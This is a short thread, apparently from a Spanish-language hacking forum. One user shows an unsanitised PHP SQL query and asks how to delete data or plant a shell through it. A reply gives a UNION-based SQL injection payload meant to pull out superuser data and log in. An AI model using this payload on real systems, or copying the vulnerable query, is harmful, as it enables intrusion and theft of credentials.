Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: xalupeao en 7 Marzo 2011, 09:29 am


Título: SQL injection, obtener mas informacion o borrara datos
Publicado por: xalupeao en 7 Marzo 2011, 09:29 am
Bueno amigos tengo la siguiente duda.

tengo esta sentencia sql

Código:
$thefaq=mysql_query("SELECT question,answer,lasteditedby,lastedit FROM faq WHERE id='$faqid'");

$faq=mysql_fetch_array($thefaq);

y para desplegar la salida html realiza la verificacion

Código:
if($faq[question]){

..... sale el HTML

}

como podria borrar datos o bien como podria ingresar una shell.

sabiendo que no el codigo entra limpio sin filtro de magic quotes etc.

Título: Re: SQL injection, obtener mas informacion o borrara datos
Publicado por: Shell Root en 7 Marzo 2011, 18:31 pm
Te encuentras en frente de una iSQL básica. Es sólo cuestión de inyectarle código para printear los datos de un super usuario, y así logguearte dentro de la aplicación. En este caso sería algo como,
Código
  1. #
  2. SELECT question, answer, lasteditedby, lastedit
  3.   FROM faq
  4.  WHERE id=''+UNION+ALL+SELECT+1,2,3,4--'
  5. #

La inyección sería,
Código
  1. '+union+all+select+1,2,3,4--

Tienes que leer tutoriales :D


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines